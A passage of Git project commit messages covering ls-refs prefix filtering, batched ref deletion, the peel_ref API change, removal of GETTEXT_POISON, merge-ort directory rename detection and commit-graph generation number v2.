Introduce a new '--deduplicate' option to suppress them.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
[jc: extended doc and rewritten commit log]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will make it easier to show only one entry per filename in the
next step.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
[jc: corrected the log message]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This situation may occur in the original code: lstat() failed
but we use `&st` to feed ie_modified() later.
Therefore, we can directly execute show_ce without the judgment of
ie_modified() when lstat() has failed.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
[jc: fixed misindented code]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
ls-refs performs a single revision walk over the whole ref namespace,
and sends ones that match with one of the given ref prefixes down to the
user.
This can be expensive if there are many refs overall, but the portion of
them covered by the given prefixes is small by comparison.
To attempt to reduce the difference between the number of refs
traversed, and the number of refs sent, only traverse references which
are in the longest common prefix of the given prefixes. This is very
reminiscent of the approach taken in b31e2680c4 (ref-filter.c: find
disjoint pattern prefixes, 2019-06-26) which does an analogous thing for
multi-patterned 'git for-each-ref' invocations.
The callback 'send_ref' is resilient to ignore extra patterns by
discarding any arguments which do not begin with at least one of the
specified prefixes.
Similarly, the code introduced in b31e2680c4 is resilient to stop early
at metacharacters, but we only pass strict prefixes here. At worst we
would return too many results, but the double checking done by send_ref
will throw away anything that doesn't start with something in the prefix
list.
Finally, if no prefixes were provided, then implicitly add the empty
string (which will match all references) since this matches the existing
behavior (see the "no restrictions" comment in "ls-refs.c:ref_match()").
Original-patch-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Correctly initialize the "prefixes" strvec using strvec_init() instead
of simply zeroing it via the earlier memset().
There's no way to trigger a crash, since the first 'ref-prefix' command
will initialize the strvec via the 'ALLOC_GROW' in 'strvec_push_nodup()'
(the alloc and nr variables are already zero'd, so the call to
ALLOC_GROW is valid).
If no "ref-prefix" command was given, then the call to
'ls-refs.c:ref_match()' will abort early after it reads the zero in
'prefixes->nr'. Likewise, strvec_clear() will only call free() on the
array, which is NULL, so we're safe there, too.
But, all of this is dangerous and requires more reasoning than it would
if we simply called 'strvec_init()', so do that.
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function was used in the ref-filter.c code to find the longest
common prefix of among a set of refspecs, and then to iterate all of the
references that descend from that prefix.
A future patch will want to use that same code from ls-refs.c, so
prepare by exposing and moving it to refs.c. Since there is nothing
specific to the ref-filter code here (other than that it was previously
the only caller of this function), this really belongs in the more
generic refs.h header.
The code moved in this patch is identical before and after, with the one
exception of renaming some arguments to be consistent with other
functions exposed in refs.h.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In git-pack-objects, we iterate over all the tags if the --include-tag
option is passed on the command line. For some reason this uses
for_each_ref which is expensive if the repo has many refs. We should
use for_each_tag_ref instead.
Because the add_ref_tag callback will now only visit tags we
simplified it a bit.
The motivation for this change is that we observed performance issues
with a repository on gitlab.com that has 500,000 refs but only 2,000
tags. The fetch traffic on that repo is dominated by CI, and when we
changed CI to fetch with 'git fetch --no-tags' we saw a dramatic
change in the CPU profile of git-pack-objects. This lead us to this
particular ref walk. More details in:
https://gitlab.com/gitlab-com/gl-infra/scalability/-/issues/746#note_483546598
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's unclear how run-command's use_shell option should impact the
arguments fed to a command. Plausibly it could mean that we glue all of
the arguments together into a string to pass to the shell, in which case
that opens the question of whether the caller needs to quote them.
But in fact we don't implement it that way (and even if we did, we'd
probably auto-quote the arguments as part of the glue step). And we must
not receive quoted arguments, because we might actually optimize out the
shell entirely (i.e., the caller does not even know if a shell will be
involved in the end or not).
Since this ambiguity may have been the cause of a recent bug, let's
document the option a bit.
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add new helper 'test_cmp_refs' to check references in a repository.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
SZEDER reported that t5411 failed in Travis CI's s390x environment a
couple of times, and could be reproduced with '--stress' test on this
specific environment. The test failure messages might look like this:
+ test_cmp expect actual
--- expect 2021-01-17 21:55:23.430750004 +0000
+++ actual 2021-01-17 21:55:23.430750004 +0000
@@ -1 +1 @@
-<COMMIT-A> refs/heads/main
+<COMMIT-A> refs/heads/maifatal: the remote end hung up unexpectedly
error: last command exited with $?=1
not ok 86 - proc-receive: not support push options (builtin protocol)
The file 'actual' is filtered from the file 'out' which contains result
of 'git show-ref' command. Due to the error messages from other process
is written into the file 'out' accidentally, t5411 failed. SZEDER finds
the root cause of this issue:
- 'git push' is executed with its standard output and error redirected
to the file 'out'.
- 'git push' executes 'git receive-pack' internally, which inherits
the open file descriptors, so its output and error goes into that
same 'out' file.
- 'git push' ends without waiting for the close of 'git-receive-pack'
for some cases, and the file 'out' is reused for test of
'git show-ref' afterwards.
- A mixture of the output of 'git show-ref' abd 'git receive-pack'
leads to this issue.
The first intuitive reaction to resolve this issue is to remove the
file 'out' after use, so that the newly created file 'out' will have a
different file descriptor and will not be overwritten by the
'git receive-pack' process. But Johannes pointed out that removing an
open file is not possible on Windows. So we use different temporary
file names to store the output of 'git push' to solve this issue.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git tag -d' accepts one or more tag refs to delete, but each deletion
is done by calling `delete_ref` on each argv. This is very slow when
removing from packed refs. Use delete_refs instead so all the removals
can be done inside a single transaction with a single update.
Do the same for 'git branch -d'.
Since delete_refs performs all the packed-refs delete operations
inside a single transaction, if any of the deletes fail then all
them will be skipped. In practice, none of them should fail since
we verify the hash of each one before calling delete_refs, but some
network error or odd permissions problem could have different results
after this change.
Also, since the file-backed deletions are not performed in the same
transaction, those could succeed even when the packed-refs transaction
fails.
After deleting branches, remove the branch config only if the branch
ref was removed and was not subsequently added back in.
A manual test deleting 24,000 tags took about 30 minutes using
delete_ref. It takes about 5 seconds using delete_refs.
Acked-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Phil Hord <phil.hord@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The peel_ref() interface is confusing and error-prone:
- it's typically used by ref iteration callbacks that have both a
refname and oid. But since they pass only the refname, we may load
the ref value from the filesystem again. This is inefficient, but
also means we are open to a race if somebody simultaneously updates
the ref. E.g., this:
int some_ref_cb(const char *refname, const struct object_id *oid, ...)
{
if (!peel_ref(refname, &peeled))
printf("%s peels to %s",
oid_to_hex(oid), oid_to_hex(&peeled);
}
could print nonsense. It is correct to say "refname peels to..."
(you may see the "before" value or the "after" value, either of
which is consistent), but mentioning both oids may be mixing
before/after values.
Worse, whether this is possible depends on whether the optimization
to read from the current iterator value kicks in. So it is actually
not possible with:
for_each_ref(some_ref_cb);
but it _is_ possible with:
head_ref(some_ref_cb);
which does not use the iterator mechanism (though in practice, HEAD
should never peel to anything, so this may not be triggerable).
- it must take a fully-qualified refname for the read_ref_full() code
path to work. Yet we routinely pass it partial refnames from
callbacks to for_each_tag_ref(), etc. This happens to work when
iterating because there we do not call read_ref_full() at all, and
only use the passed refname to check if it is the same as the
iterator. But the requirements for the function parameters are quite
unclear.
Instead of taking a refname, let's instead take an oid. That fixes both
problems. It's a little funny for a "ref" function not to involve refs
at all. The key thing is that it's optimizing under the hood based on
having access to the ref iterator. So let's change the name to make it
clear why you'd want this function versus just peel_object().
There are two other directions I considered but rejected:
- we could pass the peel information into the each_ref_fn callback.
However, we don't know if the caller actually wants it or not. For
packed-refs, providing it is essentially free. But for loose refs,
we actually have to peel the object, which would be wasteful in most
cases. We could likewise pass in a flag to the callback indicating
whether the peeled information is known, but that complicates those
callbacks, as they then have to decide whether to manually peel
themselves. Plus it requires changing the interface of every
callback, whether they care about peeling or not, and there are many
of them.
- we could make a function to return the peeled value of the current
iterated ref (computing it if necessary), and BUG() otherwise. I.e.:
int peel_current_iterated_ref(struct object_id *out);
Each of the current callers is an each_ref_fn callback, so they'd
mostly be happy. But:
- we use those callbacks with functions like head_ref(), which do
not use the iteration code. So we'd need to handle the fallback
case there, anyway.
- it's possible that a caller would want to call into generic code
that sometimes is used during iteration and sometimes not. This
encapsulates the logic to do the fast thing when possible, and
fallback when necessary.
The implementation is mostly obvious, but I want to call out a few
things in the patch:
- the test-tool coverage for peel_ref() is now meaningless, as it all
collapses to a single peel_object() call (arguably they were pretty
uninteresting before; the tricky part of that function is the
fast-path we see during iteration, but these calls didn't trigger
that). I've just dropped it entirely, though note that some other
tests relied on the tags we created; I've moved that creation to the
tests where it matters.
- we no longer need to take a ref_store parameter, since we'd never
look up a ref now. We do still rely on a global "current iterator"
variable which _could_ be kept per-ref-store. But in practice this
is only useful if there are multiple recursive iterations, at which
point the more appropriate solution is probably a stack of
iterators. No caller used the actual ref-store parameter anyway
(they all call the wrapper that passes the_repository).
- the original only kicked in the optimization when the "refname"
pointer matched (i.e., not string comparison). We do likewise with
the "oid" parameter here, but fall back to doing an actual oideq()
call. This in theory lets us kick in the optimization more often,
though in practice no current caller cares. It should never be
wrong, though (peeling is a property of an object, so two refs
pointing to the same object would peel identically).
- the original took care not to touch the peeled out-parameter unless
we found something to put in it. But no caller cares about this, and
anyway, it is enforced by peel_object() itself (and even in the
optimized iterator case, that's where we eventually end up). We can
shorten the code and avoid an extra copy by just passing the
out-parameter through the stack.
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As noted in previous commits we are removing the use of
GIT_TEST_GETTEXT_POISON=false. These tests all relied on the facility
being off, it always is off after an earlier change, but we hadn't
removed the redundant assignments to "false" in the tests.
I'm preserving the deletion of "error" lines in 38b9197a76 (t5411:
add basic test cases for proc-receive hook, 2020-08-27), it turns out
that's useful even without GIT_TEST_GETTEXT_POISON=true in
play. Update a comment added in that commit to note that.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This removes the ability to inject "poison" gettext() messages via the
GIT_TEST_GETTEXT_POISON special test setup.
I initially added this as a compile-time option in bb946bba76 (i18n:
add GETTEXT_POISON to simulate unfriendly translator, 2011-02-22), and
most recently modified to be toggleable at runtime in
6cdccfce1e (i18n: make GETTEXT_POISON a runtime option, 2018-11-08)..
The reason for its removal is that the trade-off of maintaining it
v.s. what it's getting us has long since flipped. When gettext was
integrated in 5e9637c629 (i18n: add infrastructure for translating
Git with gettext, 2011-11-18) there was understandable concern on the
Git ML that in marking messages for translation en-masse we'd
inadvertently mark plumbing messages. The GETTEXT_POISON facility was
a way to smoke those out via our test suite.
Nowadays however we're done (or almost entirely done) with any marking
of messages for translation. New messages are usually marked by their
authors, who'll know whether it makes sense to translate them or
not. If not any errors in marking the messages are much more likely to
be spotted in review than in the the initial deluge of i18n patches in
the 2011-2012 era.
So let's just remove this. This leaves the test suite in a state where
we still have a lot of test_i18n, C_LOCALE_OUTPUT
etc. uses. Subsequent commits will remove those too.
The change to t/lib-rebase.sh is a selective revert of the relevant
part of f2d17068fd (i18n: rebase-interactive: mark comments of squash
for translation, 2016-06-17), and the comment in
t/t3406-rebase-message.sh is from c7108bf9ed (i18n: rebase: mark
messages for translation, 2012-07-25).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A subsequent commit will remove GETTEXT_POISON entirely, let's start
by removing the CI jobs that enable the option.
We cannot just remove the job because the CI is implicitly depending
on the "poison" job being a sort of "default" job in the sense that
it's the job that was otherwise run with the default compiler, no
other GIT_TEST_* options etc. So let's keep it under the name
"linux-gcc-default".
This means we can remove the initial "make test" from the "linux-gcc"
job (it does another one after setting a bunch of GIT_TEST_*
variables).
I'm not doing that because it would conflict with the in-flight
334afbc76f (tests: mark tests relying on the current default for
`init.defaultBranch`, 2020-11-18) (currently on the "seen" branch, so
the SHA-1 will almost definitely change). It's going to use that "make
test" again for different reasons, so let's preserve it for now.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `SKIP_DASHED_BUILT_INS` is specified in `config.mak`, the dashed
form of the built-ins was still generated.
By moving the `SKIP_DASHED_BUILT_INS` handling after `config.mak` was
read, this can be avoided.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* en/ort-directory-rename: (28 commits)
merge-ort: fix a directory rename detection bug
merge-ort: process_renames() now needs more defensiveness
merge-ort: implement apply_directory_rename_modifications()
merge-ort: add a new toplevel_dir field
merge-ort: implement handle_path_level_conflicts()
merge-ort: implement check_for_directory_rename()
merge-ort: implement apply_dir_rename() and check_dir_renamed()
merge-ort: implement compute_collisions()
merge-ort: modify collect_renames() for directory rename handling
merge-ort: implement handle_directory_level_conflicts()
merge-ort: implement compute_rename_counts()
merge-ort: copy get_renamed_dir_portion() from merge-recursive.c
merge-ort: add outline of get_provisional_directory_renames()
merge-ort: add outline for computing directory renames
merge-ort: collect which directories are removed in dirs_removed
merge-ort: initialize and free new directory rename data structures
merge-ort: add new data structures for directory rename detection
merge-ort: add implementation of type-changed rename handling
merge-ort: add implementation of normal rename handling
merge-ort: add implementation of rename collisions
...
As noted in commit 902c521a35 ("t6423: more involved directory rename
test", 2020-10-15), when we have a case where
* dir/subdir/ has several files
* almost all files in dir/subdir/ are renamed to folder/subdir/
* one of the files in dir/subdir/ is renamed to folder/subdir/newsubdir/
* the other side of history (that doesn't do the renames) adds a
new file to dir/subdir/
Then for the majority of the file renames, the directory rename of
dir/subdir/ -> folder/subdir/
is actually not represented that way but as
dir/ -> folder/
We also had one rename that was represented as
dir/subdir/ -> folder/subdir/newsubdir/
Now, since there's a new file in dir/subdir/, where does it go? Well,
there's only one rule for dir/subdir/, so the code previously noted that
this rule had the "majority" of the one "relevant" rename and thus
erroneously used it to place the file in folder/subdir/newsubdir/. We
really want the heavy weight associated with dir/ -> folder/ to also be
treated as dir/subdir/ -> folder/subdir/, so that we correctly place the
file in folder/subdir/.
Add a bunch of logic to make sure that we use all relevant renamings in
directory rename detection.
Note that testcase 12f of t6423 still fails after this, but it gets
further than merge-recursive does. There are some performance related
bits in that testcase (the region_enter messages) that do not yet
succeed, but the rest of the testcase works after this patch.
Subsequent patch series will fix up the performance side.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since directory rename detection adds new paths to opt->priv->paths and
removes old ones, process_renames() needs to now check whether
pair->one->path actually exists in opt->priv->paths instead of just
assuming it does.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function roughly follows the same outline as the function of the
same name from merge-recursive.c, but the code diverges in multiple
ways due to some special considerations:
* merge-ort's version needs to update opt->priv->paths with any new
paths (and opt->priv->paths points to struct conflict_infos which
track quite a bit of metadata for each path); merge-recursive's
version would directly update the index
* merge-ort requires that opt->priv->paths has any leading directories
of any relevant files also be included in the set of paths. And
due to pointer equality requirements on merged_info.directory_name,
we have to be careful how we compute and insert these.
* due to the above requirements on opt->priv->paths, merge-ort's
version starts with a long comment to explain all the special
considerations that need to be handled
* merge-ort can use the full data stored in opt->priv->paths to avoid
making expensive get_tree_entry() calls to regather the necessary
data.
* due to messages being deferred automatically in merge-ort, this is
the best place to handle conflict messages whereas in
merge-recursive.c they are deferred manually so that processing of
entries does all the printing
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Due to the string-equality-iff-pointer-equality requirements placed on
merged_info.directory_name, apply_directory_rename_modifications() will
need to have access to the exact toplevel directory name string pointer
and can't just use a new empty string. Store it in a field that we can
use.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is copied from merge-recursive.c, with minor tweaks due to:
* using strmap API
* merge-ort not using the non_unique_new_dir field, since it'll
obviate its need entirely later with performance improvements
* adding a new path_in_way() function that uses opt->priv->paths
instead of doing an expensive tree_has_path() lookup to see if
a tree has a given path.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is copied from merge-recursive.c, with minor tweaks due to using strmap
API and the fact that it can use opt->priv->paths to get all pathnames that
exist instead of taking a tree object.
This depends on a new function, handle_path_level_conflicts(), which
just has a placeholder die-not-yet-implemented implementation for now; a
subsequent patch will implement it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both of these are copied from merge-recursive.c, with just minor tweaks
due to using strmap API and not having a non_unique_new_dir field.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is nearly a wholesale copy of compute_collisions() from
merge-recursive.c, and the logic remains the same, but it has been
tweaked slightly due to:
* using strmap.h API (instead of direct hashmaps)
* allocation/freeing of data structures were done separately in
merge_start() and clear_or_reinit_internal_opts() in an earlier
patch in this series
* there is no non_unique_new_dir data field in merge-ort; that will
be handled a different way
It does depend on two new functions, apply_dir_rename() and
check_dir_renamed() which were introduced with simple
die-not-yet-implemented shells and will be implemented in subsequent
patches.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
collect_renames() is similar to merge-recursive.c's get_renames(), but
lacks the directory rename handling found in the latter. Port that code
structure over to merge-ort. This introduces three new
die-not-yet-implemented functions that will be defined in future
commits.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is modelled on the version of handle_directory_level_conflicts()
from merge-recursive.c, but is massively simplified due to the following
factors:
* strmap API provides simplifications over using direct hashmap
* we have a dirs_removed field in struct rename_info that we have an
easy way to populate from collect_merge_info(); this was already
used in compute_rename_counts() and thus we do not need to check
for condition #2.
* The removal of condition #2 by handling it earlier in the code also
obviates the need to check for condition #3 -- if both sides renamed
a directory, meaning that the directory no longer exists on either
side, then neither side could have added any new files to that
directory, and thus there are no files whose locations we need to
move due to such a directory rename.
In fact, the same logic that makes condition #3 irrelevant means
condition #1 is also irrelevant so we could drop this function.
However, it is cheap to check if both sides rename the same directory,
and doing so can save future computation. So, simply remove any
directories that both sides renamed from the list of directory renames.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function is based on the first half of get_directory_renames() from
merge-recursive.c; as part of the implementation, factor out a routine,
increment_count(), to update the bookkeeping to track the number of
items renamed into new directories.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function is based on merge-recursive.c's get_directory_renames(),
except that the first half has been split out into a not-yet-implemented
compute_rename_counts(). The primary difference here is our lack of the
non_unique_new_dir boolean in our strmap. The lack of that field will
at first cause us to fail testcase 2b of t6423; however, future
optimizations will obviate the need for that ugly field so we have just
left it out.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Port some directory rename handling changes from merge-recursive.c's
detect_and_process_renames() to the same-named function of merge-ort.c.
This does not yet add any use or handling of directory renames, just the
outline for where we start to compute them. Thus, a future patch will
add port additional changes to merge-ort's detect_and_process_renames().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove diagnostics that haven't been emitted by "fsck" or its
predecessors for around 15 years. This documentation was added in
c64b9b8860 (Reference documentation for the core git commands.,
2005-05-05), but was out-of-date quickly after that.
Notes on individual diagnostics:
- "expect dangling commits": Added in bcee6fd8e7 (Make 'fsck' able
to[...], 2005-04-13), documented in c64b9b8860. Not emitted since
1024932f01 (fsck-cache: walk the 'refs' directory[...],
2005-05-18).
- "missing sha1 directory": Added in 20222118ae (Add first cut at
"fsck-cache"[...], 2005-04-08), documented in c64b9b8860. Not
emitted since 230f13225d (Create object subdirectories on demand,
2005-10-08).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Clarify that, when the packfile-uri feature is used, the client should
not assume that the extra packfiles downloaded would only contain a
single blob, but support packfiles containing multiple objects of all
types.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The tests for the 'prefetch' task create remotes and fetch refs into
'refs/prefetch/<remote>/' and tags into 'refs/tags/'. These tests use
the remotes to create objects not intended to be seen by the "local"
repository.
In that sense, the incrmental-repack tasks did not have these objects
and refs in mind. That test replaces the object directory with a
specific pack-file layout for testing the batch-size logic. However,
this causes some operations to start showing warnings such as:
error: refs/prefetch/remote1/one does not point to a valid object!
error: refs/tags/one does not point to a valid object!
This only shows up if you run the tests verbosely and watch the output.
It caught my eye and I _thought_ that there was a bug where 'git gc' or
'git repack' wouldn't check 'refs/prefetch/' before pruning objects.
That is incorrect. Those commands do handle 'refs/prefetch/' correctly.
All that is left is to clean up the tests in t7900-maintenance.sh to
remove these tags and refs that are not being repacked for the
incremental-repack tests. Use update-ref to ensure this works with all
ref backends.
Helped-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'prefetch' task fetches refs from all remotes and places them in the
refs/prefetch/<remote>/ refspace. As this task is intended to run in the
background, this allows users to keep their local data very close to the
remote servers' data while not updating the users' understanding of the
remote refs in refs/remotes/<remote>/.
However, this can clutter 'git log' decorations with copies of the refs
with the full name 'refs/prefetch/<remote>/<branch>'.
The log.excludeDecoration config option was added in a6be5e67 (log: add
log.excludeDecoration config option, 2020-05-16) for exactly this
purpose.
Ensure we set this only for users that would benefit from it by
assigning it at the beginning of the prefetch task. Other alternatives
would be during 'git maintenance register' or 'git maintenance start',
but those might assign the config even when the prefetch task is
disabled by existing config. Further, users could run 'git maintenance
run --task=prefetch' using their own scripting or scheduling. This
provides the best coverage to automatically update the config when
valuable.
It is improbable, but possible, that users might want to run the
prefetch task _and_ see these refs in their log decorations. This seems
incredibly unlikely to me, but users can always opt-in on a
command-by-command basis using --decorate-refs=refs/prefetch/.
Test that this works in a few cases. In particular, ensure that our
assignment of log.excludeDecoration=refs/prefetch/ is additive to other
existing exclusions. Further, ensure we do not add multiple copies in
multiple runs.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we create a commit with multiple signatures, neither of these
signatures includes the other. Consequently, when we produce the
payload which has been signed so we can verify the commit, we must strip
off any other signatures, or the payload will differ from what was
signed. Do so, and in preparation for verifying with multiple
algorithms, pass the algorithm we want to verify into
parse_signed_commit.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the future, we'll want to pass some of the arguments of find_subpos
to strbuf_detach, which takes a size_t. This is fine on systems where
that's the same size as unsigned long, but that isn't the case on all
systems. Moreover, size_t makes sense since it's not possible to use a
buffer here that's larger than memory anyway.
Let's switch each use to size_t for these lengths in
grab_sub_body_contents and find_subpos.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With generation data chunk and corrected commit dates implemented, let's
update the technical documentation for commit-graph.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
091f4cf (commit: don't use generation numbers if not needed,
2018-08-30) changed paint_down_to_common() to use commit dates instead
of generation numbers v1 (topological levels) as the performance
regressed on certain topologies. With generation number v2 (corrected
commit dates) implemented, we no longer have to rely on commit dates and
can use generation numbers.
For example, the command `git merge-base v4.8 v4.9` on the Linux
repository walks 167468 commits, taking 0.135s for committer date and
167496 commits, taking 0.157s for corrected committer date respectively.
While using corrected commit dates, Git walks nearly the same number of
commits as commit date, the process is slower as for each comparision we
have to access a commit-slab (for corrected committer date) instead of
accessing struct member (for committer date).
This change incidentally broke the fragile t6404-recursive-merge test.
t6404-recursive-merge sets up a unique repository where all commits have
the same committer date without a well-defined merge-base.
While running tests with GIT_TEST_COMMIT_GRAPH unset, we use committer
date as a heuristic in paint_down_to_common(). 6404.1 'combined merge
conflicts' merges commits in the order:
- Merge C with B to form an intermediate commit.
- Merge the intermediate commit with A.
With GIT_TEST_COMMIT_GRAPH=1, we write a commit-graph and subsequently
use the corrected committer date, which changes the order in which
commits are merged:
- Merge A with B to form an intermediate commit.
- Merge the intermediate commit with C.
While resulting repositories are equivalent, 6404.4 'virtual trees were
processed' fails with GIT_TEST_COMMIT_GRAPH=1 as we are selecting
different merge-bases and thus have different object ids for the
intermediate commits.
As this has already causes problems (as noted in 859fdc0 (commit-graph:
define GIT_TEST_COMMIT_GRAPH, 2018-08-29)), we disable commit graph
within t6404-recursive-merge.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since there are released versions of Git that understand generation
numbers in the commit-graph's CDAT chunk but do not understand the GDAT
chunk, the following scenario is possible:
1. "New" Git writes a commit-graph with the GDAT chunk.
2. "Old" Git writes a split commit-graph on top without a GDAT chunk.
If each layer of split commit-graph is treated independently, as it was
the case before this commit, with Git inspecting only the current layer
for chunk_generation_data pointer, commits in the lower layer (one with
GDAT) whould have corrected commit date as their generation number,
while commits in the upper layer would have topological levels as their
generation. Corrected commit dates usually have much larger values than
topological levels. This means that if we take two commits, one from the
upper layer, and one reachable from it in the lower layer, then the
expectation that the generation of a parent is smaller than the
generation of a child would be violated.
It is difficult to expose this issue in a test. Since we _start_ with
artificially low generation numbers, any commit walk that prioritizes
generation numbers will walk all of the commits with high generation
number before walking the commits with low generation number. In all the
cases I tried, the commit-graph layers themselves "protect" any
incorrect behavior since none of the commits in the lower layer can
reach the commits in the upper layer.
This issue would manifest itself as a performance problem in this case,
especially with something like "git log --graph" since the low
generation numbers would cause the in-degree queue to walk all of the
commits in the lower layer before allowing the topo-order queue to write
anything to output (depending on the size of the upper layer).
Therefore, When writing the new layer in split commit-graph, we write a
GDAT chunk only if the topmost layer has a GDAT chunk. This guarantees
that if a layer has GDAT chunk, all lower layers must have a GDAT chunk
as well.
Rewriting layers follows similar approach: if the topmost layer below
the set of layers being rewritten (in the split commit-graph chain)
exists, and it does not contain GDAT chunk, then the result of rewrite
does not have GDAT chunks either.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As discovered by Ævar, we cannot increment graph version to
distinguish between generation numbers v1 and v2 [1]. Thus, one of
pre-requistes before implementing generation number v2 was to
distinguish between graph versions in a backwards compatible manner.
We are going to introduce a new chunk called Generation DATa chunk (or
GDAT). GDAT will store corrected committer date offsets whereas CDAT
will still store topological level.
Old Git does not understand GDAT chunk and would ignore it, reading
topological levels from CDAT. New Git can parse GDAT and take advantage
of newer generation numbers, falling back to topological levels when
GDAT chunk is missing (as it would happen with a commit-graph written
by old Git).
We introduce a test environment variable 'GIT_TEST_COMMIT_GRAPH_NO_GDAT'
which forces commit-graph file to be written without generation data
chunk to emulate a commit-graph file written by old Git.
To minimize the space required to store corrrected commit date, Git
stores corrected commit date offsets into the commit-graph file, instea
of corrected commit dates. This saves us 4 bytes per commit, decreasing
the GDAT chunk size by half, but it's possible for the offset to
overflow the 4-bytes allocated for storage. As such overflows are and
should be exceedingly rare, we use the following overflow management
scheme:
We introduce a new commit-graph chunk, Generation Data OVerflow ('GDOV')
to store corrected commit dates for commits with offsets greater than
GENERATION_NUMBER_V2_OFFSET_MAX.
If the offset is greater than GENERATION_NUMBER_V2_OFFSET_MAX, we set
the MSB of the offset and the other bits store the position of corrected
commit date in GDOV chunk, similar to how Extra Edge List is maintained.
We test the overflow-related code with the following repo history:
F - N - U
/ \
U - N - U N
\ /
N - F - N
Where the commits denoted by U have committer date of zero seconds
since Unix epoch, the commits denoted by N have committer date of
1112354055 (default committer date for the test suite) seconds since
Unix epoch and the commits denoted by F have committer date of
(2 ^ 31 - 2) seconds since Unix epoch.
The largest offset observed is 2 ^ 31, just large enough to overflow.
[1]: https://lore.kernel.org/git/87a7gdspo4.fsf@evledraar.gmail.com/
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
